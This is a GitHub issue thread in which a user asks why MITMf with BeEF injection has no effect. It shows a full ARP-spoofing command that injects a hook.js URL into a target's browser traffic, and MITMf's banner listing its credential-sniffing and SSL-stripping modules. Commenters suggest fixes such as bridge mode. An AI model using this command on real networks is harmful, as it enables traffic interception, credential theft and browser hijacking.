### ISSUE TITLE
MITMF problem: No traffic

### ISSUE THREAD

**Issue by xAngelDVC** [byt3bl33d3r/MITMf#396]
Hello for everyone;

I have a problem with mitmf, i have install and i dont have any problem on the installation of mitmf or in the python installation. I wanted to make combine mitmf with beef, with the hook url. Until this point well but when i write this command: 

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.43 --inject --js-url http://127.0.0.1:3000/hook.js

To start the browser hook, the mitmf start running, all goes properly until this point and appears this:
 ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓  █████▒
▓██▒▀█▀ ██▒▓██▒▓  ██▒ ▓▒▓██▒▀█▀ ██▒▓██   ▒ 
▓██    ▓██░▒██▒▒ ▓██░ ▒░▓██    ▓██░▒████ ░ 
▒██    ▒██ ░██░░ ▓██▓ ░ ▒██    ▒██ ░▓█▒  ░ 
▒██▒   ░██▒░██░  ▒██▒ ░ ▒██▒   ░██▒░▒█░    
░ ▒░   ░  ░░▓    ▒ ░░   ░ ▒░   ░  ░ ▒ ░    
░  ░      ░ ▒ ░    ░    ░  ░      ░ ░      
░      ░    ▒ ░  ░      ░      ░    ░ ░    
       ░    ░                  ░                                                     

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

All good but here... It doesnt do nothing i go to the victim pc, i go into internet and here nothing happens. I try this in a virtual machine with Vmware, with Oracle VM and a clean installation of kali linux in other hdd and the same in all of them. Someone know how to solve it or what i am doing wrong pls ???

**Comment by jkanchelov** [comment]
I am trying the same thing right now in Nat network .. I don't receive logs and beef won't detect anything when the target is in sites like FB youtube .. but when in some smaller sites like [this](http://arenabg.com) it works fine.

**Comment by xAngelDVC** [comment]
Thank you for the response, but i have tried with that website and in mitmf nothing happens

**Comment by maumau35** [comment]
Try bridge mode, if you are runnning in virtualbox
